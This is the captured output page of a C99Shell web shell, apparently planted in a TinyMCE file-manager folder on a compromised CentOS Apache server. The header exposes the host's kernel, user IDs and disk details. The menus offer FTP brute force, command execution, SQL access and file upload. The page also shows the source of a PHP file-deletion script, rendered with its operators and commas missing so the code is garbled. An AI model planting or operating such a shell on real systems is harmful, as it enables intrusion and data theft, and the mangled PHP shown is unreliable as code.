!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16. PHP/5.4.16 

uname -a: Linux roko-bkp 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64 

uid=48(apache) gid=48(apache) groups=48(apache),1003(webmaster) 

Safe-mode: OFF (not secure)

/var/www/html/lib/tinymce/plugins/ajaxfilemanager/   drwxr-xr-x
Free 9.29 GB of 93.48 GB (9.94%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     ajax_delete_file.php (2.06 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
    
/**
     * delete selected files
     * @author Logan Cai (cailongqun [at] yahoo [dot] com [dot] cn)
     * @link www.phpletter.com
     * @since 22/April/2007
     *
     */
    
require_once(dirname(__FILE__) . DIRECTORY_SEPARATOR "inc" DIRECTORY_SEPARATOR "config.php");
    
$error "";
    if(
CONFIG_SYS_VIEW_ONLY || !CONFIG_OPTIONS_DELETE)
    {
        
$error SYS_DISABLED;
    }
    elseif(!empty(
$_GET['delete']))
    {
//delete the selected file from context menu
        
if(!file_exists($_GET['delete']))
        {
            
$error ERR_FILE_NOT_AVAILABLE;
        }
        elseif(!
isUnderRoot($_GET['delete']))
        {
            
$error ERR_FOLDER_PATH_NOT_ALLOWED;
        }else
        {
                include_once(
CLASS_FILE);
                
$file = new file();
                if(
is_dir($_GET['delete'])
                     &&  
isValidPattern(CONFIG_SYS_INC_DIR_PATTERNgetBaseName($_GET['delete'])) 
                     && !
isInvalidPattern(CONFIG_SYS_EXC_DIR_PATTERNgetBaseName($_GET['delete'])))
                    {
                        
$file->delete(addTrailingSlash(backslashToSlash($_GET['delete'])));
                    }elseif(
is_file($_GET['delete']) 
                    && 
isValidPattern(CONFIG_SYS_INC_FILE_PATTERNgetBaseName($_GET['delete']))
                    && !
isInvalidPattern(CONFIG_SYS_EXC_FILE_PATTERNgetBaseName($_GET['delete']))
                    )
                    {
                        
$file->delete(($_GET['delete']));
                    }            
        }
    }else 
    {
        if(!isset(
$_POST['selectedDoc']) || !is_array($_POST['selectedDoc']) || sizeof($_POST['selectedDoc']) < 1)
        {
            
$error ERR_NOT_FILE_SELECTED;
        }
        else 
        {

            include_once(
CLASS_FILE);
            
$file = new file();
            
            foreach(
$_POST['selectedDoc'] as $doc)
            {
                if(
file_exists($doc) && isUnderRoot($doc))
                {
                    if(
is_dir($doc)
                     &&  
isValidPattern(CONFIG_SYS_INC_DIR_PATTERN$doc
                     && !
isInvalidPattern(CONFIG_SYS_EXC_DIR_PATTERN$doc))
                    {
                        
$file->delete(addTrailingSlash(backslashToSlash($doc)));
                    }elseif(
is_file($doc
                    && 
isValidPattern(CONFIG_SYS_INC_FILE_PATTERN$doc)
                    && !
isInvalidPattern(CONFIG_SYS_EXC_FILE_PATTERN$doc)
                    )
                    {
                        
$file->delete($doc);
                    }                    
                }

                
            }
        }        
    }

    echo 
"{error:'" $error "'}";
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0043 ]--